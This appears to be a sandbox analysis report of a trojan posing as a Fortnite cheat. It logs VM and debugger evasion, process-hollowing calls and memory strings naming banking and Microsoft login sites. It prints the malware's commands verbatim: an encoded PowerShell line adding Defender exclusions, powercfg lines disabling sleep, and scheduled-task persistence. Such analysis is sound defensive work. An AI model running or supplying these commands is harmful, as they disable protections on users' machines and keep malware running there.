Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7576	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe TID: 7960	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep count: 7502 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep count: 2107 > 30	Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00F0FCDE FindFirstFileExW,	0_2_00F0FCDE
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00F0FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F0FD8F
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F0FCDE FindFirstFileExW,	2_2_00F0FCDE
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F0FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00F0FD8F

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	Binary or memory string: Vmwaretrat
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	Binary or memory string: vboxservice
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023323711.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2434592978.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023323711.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2434592978.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	Binary or memory string: Vmwareuser
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 6e d0 59 6b 97 52-b4 9a 7f 42 1f 0e 66 9c
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: FortniteHack.exe1.exe, 00000002.00000002.2434148288.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@I
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: FortniteHack.exe1.exe, 00000002.00000003.1247230655.00000000035D8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696508427p
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1487391459.000000000167B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: FortniteHack.exe1.exe, 00000002.00000002.2434319140.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023584013.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023625559.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023695031.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435438229.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	Binary or memory string: Vmtoolsd
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: FortniteHack.exe1.exe, 00000002.00000003.1247368481.00000000035CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 0_2_00E9553B _strlen,GetModuleHandleA,GetProcAddress,VirtualProtect,LdrInitializeThunk,OleDraw,GetModuleHandleA,GetProcAddress,OleDraw,FreeConsole,__fread_nolock,_strlen,_strlen,FreeConsole,__fread_nolock,FreeConsole,__fread_nolock,

0_2_00E9553B

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 0_2_00EFDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EFDC9E

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 0_2_00F261B4 mov edi, dword ptr fs:[00000030h]

0_2_00F261B4

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 0_2_00F0B71C GetProcessHeap,

0_2_00F0B71C

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EFD8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EFD8E2
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EFDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EFDC9E
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EFDC92 SetUnhandledExceptionFilter,	0_2_00EFDC92
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00F05DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F05DCE
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EFD8E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00EFD8E2
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00EFDC9E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00EFDC9E
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 2_2_00F05DCE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F05DCE

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 0_2_00F261B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00F261B4

Encrypted powershell cmdline option found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded <#UjoiODTn#> Add-MpPreference <#Aes#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#d96fcDvcc5#> -Force <#YJOS8x#>
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded <#UjoiODTn#> Add-MpPreference <#Aes#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#d96fcDvcc5#> -Force <#YJOS8x#>			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Memory written: C:\Users\user\Desktop\FortniteHack.exe1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Process created: C:\Users\user\Desktop\FortniteHack.exe1.exe "C:\Users\user\Desktop\FortniteHack.exe1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA=="	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4422" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaagbvagkatwbeafqabgajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajaeeazqbzacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqaoqa2agyaywbeahyaywbjaduaiwa+acaalqbgag8acgbjaguaiaa8acmawqbkae8auwa4ahgaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaagbvagkatwbeafqabgajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajaeeazqbzacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqaoqa2agyaywbeahyaywbjaduaiwa+acaalqbgag8acgbjaguaiaa8acmawqbkae8auwa4ahgaiwa+aa=="
Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaagbvagkatwbeafqabgajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajaeeazqbzacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqaoqa2agyaywbeahyaywbjaduaiwa+acaalqbgag8acgbjaguaiaa8acmawqbkae8auwa4ahgaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaagbvagkatwbeafqabgajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajaeeazqbzacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqaoqa2agyaywbeahyaywbjaduaiwa+acaalqbgag8acgbjaguaiaa8acmawqbkae8auwa4ahgaiwa+aa=="	Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: GetLocaleInfoW,	0_2_00F0F8B3
